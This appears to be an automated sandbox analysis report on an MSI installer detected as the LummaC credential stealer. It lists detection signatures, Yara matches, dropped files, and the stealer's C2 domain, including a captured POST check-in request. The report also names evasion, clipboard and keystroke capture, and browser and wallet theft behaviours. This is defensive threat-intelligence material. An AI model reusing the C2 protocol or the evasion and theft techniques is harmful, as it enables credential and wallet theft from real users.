Edit tour

Windows Analysis Report
promot_s.msi

Overview

General Information

Sample Name:	promot_s.msi
Analysis ID:	1308846
MD5:	96d99e6c2e7c358b9d663595d3af5f27
SHA1:	07e7c360b6fb5bf7c124aa6156b9d3c73d0dd9ec
SHA256:	301432e6053a0f092e8f5137a97ef3543934e0f8e200bd0c7844886e4c72e7e9
Tags:	msi
Infos:

Detection

LummaC Stealer

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected LummaC Stealer

Malicious sample detected (through community Yara rule)

PE file has a writeable .text section

Query firmware table information (likely to detect VMs)

Tries to evade debugger and weak emulator (self modifying code)

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Contains functionality to modify clipboard data

PE file has nameless sections

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Deletes files inside the Windows folder

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Creates files inside the system directory

PE file contains sections with non-standard names

Sleep loop found (likely to delay execution)

Detected potential crypto function

Found potential string decryption / allocating functions

Yara detected Credential Stealer

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to read the clipboard data

Found dropped PE file which has not been started or loaded

Contains functionality to record screenshots

HTTP GET or POST without a user agent

PE file contains executable resources (Code or Archives)

Searches for user specific document files

Is looking for software installed on the system

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

PE file contains an invalid checksum

Drops PE files

Tries to load missing DLLs

Drops PE files to the windows directory (C:\Windows)

Queries keyboard layouts

Contains functionality to retrieve information about pressed keystrokes

Launches processes in debugging mode, may be used to hinder debugging

Checks for available system drives (often done to infect USB drives)

Found large amount of non-executed APIs

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64

msiexec.exe (PID: 668 cmdline: "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\promot_s.msi" MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 6472 cmdline: C:\Windows\system32\msiexec.exe /V MD5: 4767B71A318E201188A0D0A420C8B608)

msiexec.exe (PID: 6860 cmdline: C:\Windows\syswow64\MsiExec.exe -Embedding A3469819A8715BFB02FD0117F532ABA5 MD5: 12C17B5A5C2A7B97342C362CA467E9A2)

ImBatch.exe (PID: 1792 cmdline: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe MD5: 13D6ED715E2ADD3C52A9E6A0C79649DE)

cleanup

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.431118657.0000000004270000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_a7da40b7	unknown	unknown	0xaf7a:$a: 18 B9 10 00 00 00 83 E2 0F 2B CA 3B 4D 14 76 03 8B 4D 14 8D 5C
00000003.00000002.429544936.00000000020E1000.00000040.00000001.01000000.00000003.sdmp	Windows_Trojan_RedLineStealer_a7da40b7	unknown	unknown	0xb0b8:$a: 18 B9 10 00 00 00 83 E2 0F 2B CA 3B 4D 14 76 03 8B 4D 14 8D 5C
00000003.00000002.429544936.00000000020E1000.00000040.00000001.01000000.00000003.sdmp	Windows_Trojan_RedLineStealer_d4b38e13	unknown	unknown	0x83c5:$a: 5B 5D C2 04 00 8B C2 5F 5E 5B 5D C2 04 00 55 8B EC 57 8B 45 08 0F
Process Memory Space: ImBatch.exe PID: 1792	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ImBatch.exe PID: 1792	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security

HTTP traffic detected: POST /api HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: treepledeeple.funContent-Length: 47Cache-Control: no-cacheData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 6c 69 64 3d 4c 6c 6e 42 68 69 26 6a 3d 64 65 66 61 75 6c 74 26 76 65 72 3d 34 2e 30 Data Ascii: act=recive_message&lid=LlnBhi&j=default&ver=4.0

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49722 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719

Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: &redirect_uri=fhttps://www.facebook.com/connect/login_success.html equals www.facebook.com (Facebook)
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: 3https://www.facebook.com/connect/login_success.html equals www.facebook.com (Facebook)
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: Vhttps://www.facebook.com/v3.2/dialog/oauth? equals www.facebook.com (Facebook)
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.facebook.com/ImBatchU equals www.facebook.com (Facebook)

Source: promot_s.msi	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: promot_s.msi	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: promot_s.msi	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://ccsca2021.crl.certum.pl/ccsca2021.crl0s
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://ccsca2021.ocsp-certum.com05
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://crl.certum.pl/ctnca.crl0k
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://crl.certum.pl/ctnca2.crl0l
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://crl.certum.pl/ctsca2021.crl0o
Source: ImBatch.exe, 00000003.00000003.341101707.00000000119E4000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.439109500.0000000011A00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: promot_s.msi	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: promot_s.msi	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: promot_s.msi	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://iptc.org/std/Iptc4xmpCore/1.0/xmlns/
Source: ImBatch.exe, 00000003.00000003.341101707.0000000011A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nginx.com/
Source: ImBatch.exe, 00000003.00000003.341101707.0000000011A3C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://nginx.org/
Source: promot_s.msi	String found in binary or memory: http://ocsp.digicert.com0A
Source: promot_s.msi	String found in binary or memory: http://ocsp.digicert.com0C
Source: promot_s.msi	String found in binary or memory: http://ocsp.digicert.com0X
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://repository.certum.pl/ccsca2021.cer0
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://repository.certum.pl/ctnca.cer09
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://repository.certum.pl/ctnca2.cer09
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://repository.certum.pl/ctsca2021.cer0
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://subca.ocsp-certum.com01
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://subca.ocsp-certum.com02
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://subca.ocsp-certum.com05
Source: ImBatch.exe, 00000003.00000003.356486958.0000000011A97000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.438606668.0000000010E28000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.439109500.0000000011A98000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.439109500.0000000011AB0000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.439109500.0000000011A2F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/
Source: ImBatch.exe, 00000003.00000002.439109500.0000000011A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/)~
Source: ImBatch.exe, 00000003.00000003.356486958.0000000011A97000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.439109500.0000000011A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/M~
Source: ImBatch.exe, 00000003.00000003.357592977.0000000011B00000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.342487697.00000000119EB000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.341101707.00000000119E4000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.438606668.0000000010E28000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.348965065.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.345541530.0000000011A56000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.429735323.0000000002301000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.347749107.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.356426905.0000000011B00000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.351357276.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.439109500.0000000011AFC000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.439109500.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.439109500.00000000119E8000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.346670478.0000000011A56000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.352521233.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/api
Source: ImBatch.exe, 00000003.00000002.439109500.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/api4
Source: ImBatch.exe, 00000003.00000002.429735323.0000000002301000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/apiYf(
Source: ImBatch.exe, 00000003.00000003.342487697.0000000011A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/apiknO
Source: ImBatch.exe, 00000003.00000002.439109500.0000000011AFC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/apill
Source: ImBatch.exe, 00000003.00000003.357592977.0000000011B00000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.356426905.0000000011B00000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/apit
Source: ImBatch.exe, 00000003.00000003.348965065.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.351357276.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.352521233.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/apiy
Source: ImBatch.exe, 00000003.00000003.342487697.0000000011A12000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/apiyn=
Source: ImBatch.exe, 00000003.00000002.439109500.0000000011A98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/dgu9KJmQNWh2jBFDNudvURZNYY9bL1uX64pRUiw3Xp7hBaZF8mg7wlAe
Source: ImBatch.exe, 00000003.00000003.342487697.00000000119F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/on%
Source: ImBatch.exe, 00000003.00000003.342487697.00000000119F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/on5
Source: ImBatch.exe, 00000003.00000003.356486958.0000000011A97000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/t~
Source: ImBatch.exe, 00000003.00000003.341101707.00000000119D1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun/u
Source: ImBatch.exe, 00000003.00000003.348965065.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.343818093.0000000011A56000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.351357276.0000000011A5A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://treepledeeple.fun:80/api
Source: ImBatch.exe, 00000003.00000002.423471944.0000000001FEF000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://umich.edu/~shameem)
Source: ImBatch.exe, ImBatch.exe, 00000003.00000002.437311329.0000000010801000.00000020.00000001.01000000.00000008.sdmp	String found in binary or memory: http://www.aiim.org/pdfa/ns/id/
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: http://www.certum.pl/CPS0
Source: ImBatch.exe, 00000003.00000002.419386742.00000000006F6000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: http://www.eurekalog.com/help/eurekalog/internal_errors.phpEurekaLog
Source: ImBatch.exe, 00000003.00000002.423018619.000000000108E000.00000020.00000001.01000000.00000003.sdmp, ImBatch.exe, 00000003.00000002.435094298.0000000005180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.indyproject.org/
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://crowdin.com/project/imbatchU
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: https://github.com/winmerge/winimergeB
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://imagemagick.org/script/download.php#windowsopen
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: ImBatch.exe, 00000003.00000002.435094298.0000000005180000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bolidesoft.com
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.bolidesoft.com/a/activate/activate.php?pid=110&kid=112&hw=
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.bolidesoft.com/a/banner/check.php?pid=110&b=
Source: ImBatch.exe, 00000003.00000002.434496945.000000000505E000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.bolidesoft.com/a/banner/check.php?pid=110&b=760&l=9&f=n&ab=%3Cclick%20to%20set%20your%20
Source: WinIMergeLib.dll.1.dr	String found in binary or memory: https://www.certum.pl/CPS0
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/
Source: ImBatch.exe, 00000003.00000002.438606668.0000000010E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/
Source: ImBatch.exe, 00000003.00000002.438606668.0000000010E28000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/#
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.google-analytics.com/collect?v=1&tid=
Source: ImBatch.exe, 00000003.00000002.429735323.0000000002234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com/collect?v=1&tid=UA-380480-23&cid=%7B85D50C94-EF68-44C5-88E8-10362A6
Source: ImBatch.exe, 00000003.00000002.439109500.00000000119B8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: ImBatch.exe, 00000003.00000002.440238833.0000000014882000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.354382134.00000000148C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome
Source: ImBatch.exe, 00000003.00000002.440238833.0000000014882000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.354382134.00000000148C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148B0000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.440238833.000000001486A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chrome/Google
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148B0000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.440238833.000000001486A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/chromeGoogle
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148E7000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: ImBatch.exe, 00000003.00000003.354382134.00000000148C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=.net
Source: ImBatch.exe, 00000003.00000002.440238833.000000001486A000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.354382134.00000000148C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3D.net%2B4.8%26oq%3D.n
Source: ImBatch.exe, 00000003.00000002.439109500.00000000119F6000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.341101707.00000000119E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/
Source: ImBatch.exe, 00000003.00000002.435094298.0000000005180000.00000004.00001000.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.437214184.000000001043C000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/download-center/imbatch
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/feedback/imbatch/f.php
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/help/imbatch/filter_taskU
Source: ImBatch.exe, 00000003.00000002.429735323.0000000002234000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/ht
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/imb_order.php?LangID=
Source: ImBatch.exe, 00000003.00000002.438606668.0000000010E28000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.438606668.0000000010E68000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.435094298.0000000005209000.00000004.00001000.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.437214184.000000001043C000.00000004.00000010.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.341101707.0000000011A11000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/upd/imbatch/url
Source: ImBatch.exe, 00000003.00000003.341101707.0000000011A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/upd/imbatch/urlF
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/upd/imbatch/urlU
Source: ImBatch.exe, 00000003.00000003.341101707.0000000011A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/upd/imbatch/urlf
Source: ImBatch.exe, 00000003.00000003.341101707.0000000011A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/upd/imbatch/urln
Source: ImBatch.exe, 00000003.00000003.341101707.0000000011A11000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/upd/imbatch/url~
Source: ImBatch.exe, 00000003.00000002.420853583.0000000000AF7000.00000020.00000001.01000000.00000003.sdmp, ImBatch.exe, 00000003.00000002.439795724.000000001423B000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/upd/imbatch/version
Source: ImBatch.exe, 00000003.00000003.341101707.00000000119E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/upd/imbatch/version5
Source: ImBatch.exe, 00000003.00000002.439109500.00000000119F6000.00000004.00000020.00020000.00000000.sdmp, ImBatch.exe, 00000003.00000003.341101707.00000000119E4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.highmotionsoftware.com/y

Source: unknown

DNS traffic detected: queries for: www.bolidesoft.com

Source: global traffic	HTTP traffic detected: GET /upd/imbatch/version HTTP/1.1User-Agent: ImBatchUpdaterHost: www.highmotionsoftware.com
Source: global traffic	HTTP traffic detected: GET /upd/imbatch/url HTTP/1.1User-Agent: ImBatchUpdaterHost: www.highmotionsoftware.com
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Connection: Keep-AliveUser-Agent: TeslaBrowser/5.5Host: treepledeeple.fun

Source: unknown

HTTPS traffic detected: 104.193.111.101:443 -> 192.168.2.5:49721 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_1080DDC2 SetClipboardData,

3_2_1080DDC2

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_1080DAA6 GetClipboardData,

3_2_1080DAA6

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_10855770 GetObjectW,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

3_2_10855770

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_1080DB16 GetKeyboardState,

3_2_1080DB16

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe

Code function: 3_2_1080DCFE OpenClipboard,

3_2_1080DCFE

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000003.00000002.431118657.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_a7da40b7 Author: unknown
Source: 00000003.00000002.429544936.00000000020E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_a7da40b7 Author: unknown
Source: 00000003.00000002.429544936.00000000020E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_d4b38e13 Author: unknown

PE file has a writeable .text section

Source: WinIMergeLib.dll.1.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

PE file has nameless sections

Source: ImBatch.exe.1.dr	Static PE information: section name:
Source: ImBatch.exe.1.dr	Static PE information: section name:
Source: ImBatch.exe.1.dr	Static PE information: section name:
Source: ImBatch.exe.1.dr	Static PE information: section name:
Source: ImBatch.exe.1.dr	Static PE information: section name:
Source: ImBatch.exe.1.dr	Static PE information: section name:

Source: 00000003.00000002.431118657.0000000004270000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_a7da40b7 reference_sample = 2fb7241ffdfa7525f125e6d7b18e895cfb512ebb6905d056dbe7d76e8d6df806, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 62a62ede10d977582329b3daaa80b0b64576add77736135bac97d3a3eb6de558, id = a7da40b7-63cc-4456-a592-0485932092d5, last_modified = 2022-04-12
Source: 00000003.00000002.429544936.00000000020E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_a7da40b7 reference_sample = 2fb7241ffdfa7525f125e6d7b18e895cfb512ebb6905d056dbe7d76e8d6df806, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 62a62ede10d977582329b3daaa80b0b64576add77736135bac97d3a3eb6de558, id = a7da40b7-63cc-4456-a592-0485932092d5, last_modified = 2022-04-12
Source: 00000003.00000002.429544936.00000000020E1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_d4b38e13 reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = c91f97a7e609d8138f8c5c7dd66cf675b1b3762f26baa5bf983ee212011b99cb, id = d4b38e13-1439-4549-ba90-0b4a8ed57fb3, last_modified = 2022-04-12

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI3086.tmp

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

File created: C:\Windows\Installer\3b2df6.msi

Jump to behavior

Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_109E11B8	3_2_109E11B8
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_109E8C5C	3_2_109E8C5C
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_10A3B05C	3_2_10A3B05C
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_109D11AC	3_2_109D11AC
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_1085B298	3_2_1085B298
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_108F42E8	3_2_108F42E8
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_1085A25C	3_2_1085A25C
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_108F339C	3_2_108F339C
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_1099C380	3_2_1099C380
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_108F43D4	3_2_108F43D4
Source: C:\Users\user\AppData\Local\Pro Motion NG - V8 Community\ImBatch.exe	Code function: 3_2_109AC404	3_2_109AC404
